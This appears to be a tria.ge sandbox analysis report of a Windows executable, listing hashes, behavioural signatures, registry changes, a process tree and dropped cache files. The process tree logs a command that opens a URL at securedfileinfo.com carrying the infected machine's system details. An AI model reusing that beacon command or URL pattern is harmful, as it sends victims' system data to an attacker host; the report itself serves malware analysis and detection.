Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
127s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 15:44
Static task
static1
Behavioral task
behavioral1
Sample
dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe
Resource
win10v2004-20220812-en
General
-
Target
dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe
-
Size
143KB
-
MD5
b701ed818fb6eebef97ba549ea3e6222
-
SHA1
a8b008ce8c9f9d13b3659d74929261abe0ec81c5
-
SHA256
dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e
-
SHA512
2543edca349e8a06d3cd6fe904a963bba500fc0aa514cc3a12a20acc5faa5444eafb17f33475bfd5a6704e7873a74f99f81fa83c114beb98a5ead6c32c93da47
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45DdPT:pe9IB83ID5BPT
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376412423" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F8A459B1-6F2C-11ED-8B0A-7A3897842414} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007165517cc9d2254c9eca51fadbf6101e0000000002000000000010660000000100002000000037a4716335d500006b0b135099f3996ce7f36e33473537b223d554557a72c0c3000000000e80000000020000200000002ff1ef610351169bccde5abbb11510b75231a54b3c3e4747b5c8f5d629f6a2492000000088dde68c713ef6b229c96ed4d53fe12dbc52c54b15631f422eaabfac8c64dbd240000000df88b0406c766b4cb95d56f8dbcbc30abd890263d4f57268d81cf3b53e201a6617b8afaf710b2da8014b184fb3a8fb366b5a5361d87e1c815eb49225696ee63a iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0c982df3903d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007165517cc9d2254c9eca51fadbf6101e00000000020000000000106600000001000020000000b1bff0b18d8bb199a9574a197cb084329144100ab88100fcc261950b8a71d10e000000000e8000000002000020000000664918a00e8a9ac1b862a88dec7773819c661ffac5cf81ada2eb7ded19859ca590000000d0645236eb3aa238ab386a990f0642ae5035290f5b3abfb485108547f8eb4cb5c20b2ebe27a3663285c0acdf8bf0aef4a00ed2d06b264f1e7e91c3a7080dd39fdb45ad30ff3382bca91773240451a5153fd2c0a6529d475fa9ba3bf6b14f915c617206fb21d55641bc7c5c50c4a02962f8b7da5d2009e5aec4eaaee0eef83c1637978b58ef0308305ab5447ff460041c40000000ab175edb1dafed5322f33ed4cc2c603675f99cbd3cd67b7f6be69537a0641283cd6e91834f93322006081f72cda8bd8cc4f6a36a6077e92610c05def939d2481 iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe 752 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 752 iexplore.exe 752 iexplore.exe 1960 IEXPLORE.EXE 1960 IEXPLORE.EXE 1960 IEXPLORE.EXE 1960 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1928 wrote to memory of 1536 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe 29 PID 1928 wrote to memory of 1536 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe 29 PID 1928 wrote to memory of 1536 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe 29 PID 1928 wrote to memory of 1536 1928 dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe 29 PID 1536 wrote to memory of 752 1536 cmd.exe 31 PID 1536 wrote to memory of 752 1536 cmd.exe 31 PID 1536 wrote to memory of 752 1536 cmd.exe 31 PID 1536 wrote to memory of 752 1536 cmd.exe 31 PID 752 wrote to memory of 1960 752 iexplore.exe 32 PID 752 wrote to memory of 1960 752 iexplore.exe 32 PID 752 wrote to memory of 1960 752 iexplore.exe 32 PID 752 wrote to memory of 1960 752 iexplore.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe"C:\Users\Admin\AppData\Local\Temp\dc1ab039a44f72fe847cae5a91d783570398ffd2ca0a5641b89f2a542e7e3d4e.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt35^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt35|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:752 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1960
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD57ef66f502cb164d6d88fd779895d5e07
SHA175c68e887afe0041c18bc01dc36ae719db07a436
SHA256084f8949af79ac48c5c245e4bbeea807949d1e8e182e7d0487227231fcd97a77
SHA512419b6e5def7e1051af856ea4256235fa4f1bdbf001b54f1db9e59c44f7da8f9cfa8d63f77e35345ec6d5c3ab13de10094281d44f42a7e1fd9d92b3b68ac5ba9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD522c0f3f1266108b1d1c49bd02c976971
SHA1711c376d4ce0a641d9830c9d4621e4b7dc5093bf
SHA256d4ba705e8aa98dfc7aeb63bce6b17320992e2db5932196caa8b5881e97788b0d
SHA512041595781b194ba14ced53e7d1ff51e1c4940035be19b19d34d25e0fd6f2d5feb9c1e510502c12d620a9bc9945fec4a8c51df55894df961162fca03df6faf14c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD505989c16560dde9ae220067ef12204e9
SHA17ab0fdf43a15191652e9e4b71fba2fb172e56308
SHA256b8ac986219843139d82240bbb12d910c5589e9488d2b9fa87d2349e687e6c48e
SHA512df1a9057966102f4b6531510675141ee34f59adb5e7efefe13a382cda0458240e02d7db8be909621522cce6233735fd18f18f65a0b2a15edaaa2502aab52cfd0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD5bff6cb5a0f1595e5e31e6846932147bc
SHA1504be205076f611f69128fe12500643e2d561955
SHA256c1870b91864c5d13cfd615e2b8d2e40adac4c5c409e30079cc870fa90b508319
SHA512ffcdcc24638e815cdfa378ab33a803c0729cabaf6f4807b75d0f2f7b00d7ec9b8dfc45d3bb8a6aac42064697f40f66a6d91c6777c19fc82839a5205c5c31cb3f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD5709377fbcc454ba4cc2edd667d5c7f2a
SHA10f91522067ce487c102d04ef3b07a55f047767e1
SHA256828f1f0fab27ba12395e6a0dd2cfb03d0f244dcb64fec122b9e3c9c12b893ead
SHA512c694acdc699363a4a32bde36a18d75058ed842f6d69da282d41a42bcf5c047cb7146792778e089d681b17fe45bab4b10267f30bbed6289a48901d30897a38ede
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD599de65781f5d7f62cf442f23f0db68ce
SHA1f439ad5a1130602eb510de773afb6ed9c0e6cedc
SHA256df7fe067321963da702825fc812f5b1b42ae872f4ae8b78fa6a3f67a4e2ab2b0
SHA512c602d2018833d9dcdbf9d955d62c65197ceb30527e4db334bc8a747dcf0c19b61a46720407306e40961a2732f2e7bfe3551c736dac939566e5b5d93535fbdd6b
-
Filesize
601B
MD5927e023e737f547c4f6cd48f78a7f4f7
SHA15b2d2b3b368b653f9e7b003d17ee73048f6d06a1
SHA256bf65382444fb7cd5e911bd693fb08bbc4754b7d6c2a6bded81b12f952a8c8197
SHA5129d6d8dbc002cadcfbbe43c7b13454fc3bb5a29998be668e9cf2b44a11c81d62f011d29e56b1d8f94d3b13aa29dffda57632c3f29c1a4fa756b7f0c471c7e0ab8